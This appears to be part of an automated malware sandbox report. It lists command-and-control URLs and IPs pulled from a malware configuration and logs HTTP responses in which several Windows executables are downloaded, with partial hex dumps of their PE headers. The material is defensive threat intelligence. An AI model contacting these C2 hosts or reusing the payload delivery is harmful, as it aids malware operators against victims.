C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor	IPs: 185.215.113.19

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:04 GMTContent-Type: application/octet-streamContent-Length: 250368Last-Modified: Sat, 27 Jul 2024 03:21:04 GMTConnection: keep-aliveETag: "66a467a0-3d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 67 94 73 10 06 fa 20 10 06 fa 20 10 06 fa 20 7f 70 51 20 0b 06 fa 20 7f 70 64 20 00 06 fa 20 7f 70 50 20 74 06 fa 20 19 7e 69 20 1b 06 fa 20 10 06 fb 20 64 06 fa 20 7f 70 55 20 11 06 fa 20 7f 70 60 20 11 06 fa 20 7f 70 67 20 11 06 fa 20 52 69 63 68 10 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 2c 7f 18 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 78 03 02 00 00 00 00 e9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 9a 07 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 58 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 18 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e8 32 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 61 73 69 77 69 64 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6d 75 66 75 00 00 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:07 GMTContent-Type: application/octet-streamContent-Length: 3171840Last-Modified: Sat, 27 Jul 2024 03:08:39 GMTConnection: keep-aliveETag: "66a464b7-306600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 98 64 a4 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 c6 08 00 00 00 00 00 44 58 ad 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 ad 00 00 04 00 00 13 ca 12 00 02 00 40 80 00 00 80 00 00 20 00 00 00 00 80 00 00 20 00 00 00 00 00 00 10 00 00 00 50 40 8c 00 4e 0d 00 00 a0 4d 8c 00 4c 04 00 00 00 d0 12 00 e8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 8c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 00 10 00 00 00 00 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 03 00 00 c0 09 00 00 f2 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 0c 00 00 04 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 05 00 00 40 0d 00 00 f6 04 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 50 12 00 00 62 00 00 00 f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 90 00 00 00 d0 12 00 00 8e 00 00 00 52 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 b0 78 00 00 60 13 00 00 28 03 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 60 21 00 00 10 8c 00 00 5e 21 00 00 08 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
